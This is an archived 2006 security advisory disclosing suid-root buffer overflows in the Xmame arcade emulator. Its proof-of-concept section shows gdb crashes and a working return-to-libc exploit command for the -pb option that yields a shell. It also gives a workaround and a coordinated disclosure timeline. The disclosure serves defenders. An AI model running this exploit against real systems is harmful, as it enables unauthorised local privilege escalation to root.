Xmame buffer overflow, with a possibility of privilege escalation.

2006-01-11T00:00:00
ID SECURITYVULNS:DOC:10983
Type securityvulns
Reporter Securityvulns
Modified 2006-01-11T00:00:00

Description

mysec.org Security Advisory : Xmame buffer overflow, with a possibility of privilege escalation

Xmame buffer overflow, with a possibility of privilege escalation

mysec.org Security Advisory 11 Jan 2006 http://www.mysec.org

I. BACKGROUND

Xmame and xmess are ports of MAME, the Multiple Arcade Machine Emulator and MESS, the Multi Emulator Super System. They run primarily on Linux

and various flavors of UNIX, although some other operating systems, such as BeOS, are supported to some degree.

II. DESCRIPTION

Several functions in src/fileio.c and src/unix/fileio.c did not handle

large input propely. These can cause buffer overflow.

Most of the distros install xmame with suid root. There is a possibility for a local user to gain root privilege.

Exploitation requires an attacker to send a specially

constructed input for these few arguments.

-lang -ctrlr -pb -rec

For Ubuntu default installation, which is version 0.86 there is a option which infacetd.

-jdev

III. POC

POC for -pb and -rec options , other options will be base on these info.


  • -pb

(gdb) r -pb `ruby -e 'print "A" * 1034'` The program being debugged has been started already.

Start it from the beginning? (y or n) y Starting program: /usr/games/xmame.x11 -pb `ruby -e 'print "A" * 1034'` (no debugging symbols found) More (no debugging symbols found) [Thread debugging using libthread_db enabled]

[New Thread -1211603264 (LWP 8770)] DGA requires root rights Use of DGA-modes is disabled (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found)

info: trying to parse: /etc/xmame/xmamerc error: /etc/xmame/xmamerc(71): unknown option joyusb-calibrate, ignoring line info: trying to parse: /home/xwings/.xmame/xmamerc info: trying to parse: /etc/xmame/xmame-x11rc

info: trying to parse: /home/xwings/.xmame/xmame-x11rc

Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1211603264 (LWP 8770)] 0x41414141 in ?? ()


  • -rec

(gdb) r -rec `ruby -e 'print "A" * 1020'` The program being debugged has been started already. Start it from the beginning? (y or n) y

Starting program: /home/xwings/coding/sploit/xmame/xmame- 0.102/xmame.x11 -rec `ruby -e 'print "A" * 1020'` (no debugging symbols found) More (no debugging symbols found) info: trying to parse: /usr/local/share/xmame/xmamerc info: trying to parse: /home/xwings/.xmame/xmamerc

info: trying to parse: /usr/local/share/xmame/xmame-x11rc info: trying to parse: /home/xwings/.xmame/xmame-x11rc info: trying to parse: /usr/local/share/xmame/rc/robbyrc info: trying to parse: /home/xwings/.xmame/rc/robbyrc

Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()


  • Successful Exploit

Platform : Ubuntu Xmame Version : 0.102 - Selfcompile

Exploit Method : Return to Libc

xwings@pauillac.<xmame-0.102>$ ./xmame.x0 -pb `ruby -e 'print "\x90" * 1016;print "\xd0\xf6\xd8\xb7";print "DUMP";print "\xaa\xf8\xff\xbf"'`

info: trying to parse: /usr/local/share/xmame/xmamerc info: trying to parse: /home/xwings/.xmame/xmamerc info: trying to parse: /usr/local/share/xmame/xmame-x11rc info: trying to parse: /home/xwings/.xmame/xmame-x11rc

sh-3.1$

IV. DETECTION

mysec.org has confirmed this vulnerability on xmame 0.102. All previous versions are suspected vulnerable to this issue.

V. WORKAROUND

Disable SUID root for all the installed xmame. Do not run xmame.x11, xmame.sdl is recommended.

VI. VENDOR RESPONSE

Upgrade to CVS version.

http://x.mame.net/download.html

VIII. DISCLOSURE TIMELINE

1st Jan 2006, Initial vendor notification 2nd January 2006, Initial vendor response 11th January 2006, Vendor reply, bug fixed. 11th January 2006, Coordinated public disclosure

IX. CREDIT

Bug Founder : KaiJern, Lau Email : xwings <at> mysec <dot> org